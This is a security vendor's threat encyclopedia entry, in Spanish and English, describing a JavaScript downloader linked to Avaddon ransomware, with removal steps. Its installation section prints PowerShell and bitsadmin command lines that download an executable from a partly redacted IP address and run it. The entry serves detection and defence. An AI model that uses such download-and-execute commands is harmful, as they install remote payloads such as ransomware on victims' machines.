Trojan.JS.AVADDON.YJAF-A
Trojan:Win32/AggBITSAbuse.A (MICROSOFT); PowerShell/TrojanDownloader.Agent.DV trojan (NOD32)
Windows
Tipo de malware
Trojan
Destructivo?
No
Cifrado
No
In the Wild:
Sí
Resumen y descripción
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Después ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.
Detalles técnicos
Detalles de entrada
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Instalación
Agrega los procesos siguientes:
- %System%\cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://{BLOCKED}.{BLOCKED}.117.63/{jpr.exe or sava.exe}','%User Temp%\{random numbers}.exe');Start-Process '%User Temp%\{random numbers}.exe'
- %System%\cmd.exe /c bitsadmin /transfer getitman /download /priority high http:/{BLOCKED}.{BLOCKED}.117.63/{jpr.exe or sava.exe} %User Temp%\{random numbers}.exe&start %User Temp%\{random numbers}.exe
Rutina de descarga
Este malware descarga el archivo desde la siguiente URL y le cambia el nombre al almacenarlo en el sistema afectado:
- http://{BLOCKED}.{BLOCKED}.117.63/jpr.exe
- http://{BLOCKED}.{BLOCKED}.117.63/sava.exe
Guarda los archivos que descarga con los nombres siguientes:
- %User Temp%\{random numbers}.exe → Detected as Ransom.Win32.AVADDON.YJAF-A
Después ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.
Soluciones
Step 1
Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.
Step 2
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Explorar el equipo con su producto de Trend Micro para eliminar los archivos detectados como Trojan.JS.AVADDON.YJAF-A En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.
Rellene nuestra encuesta!